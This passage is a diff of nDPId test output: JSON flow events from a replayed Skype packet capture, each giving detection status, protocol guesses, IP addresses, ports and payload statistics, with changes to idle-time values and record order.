{"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969657367,"flow_last_seen":1431969676525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969675567,"flow_last_seen":1431969675716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969658979,"flow_last_seen":1431969678254,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3251,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969658978,"flow_last_seen":1431969677390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969802019,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3269,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808100,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969723753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969665416,"flow_last_seen":1431969685656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969692603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969681480,"flow_last_seen":1431969709213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969690481,"flow_last_seen":1431969722726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50077,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969699577,"flow_last_seen":1431969718631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969704664,"flow_last_seen":1431969722362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":241,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969788719,"flow_last_seen":1431969803191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50143,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 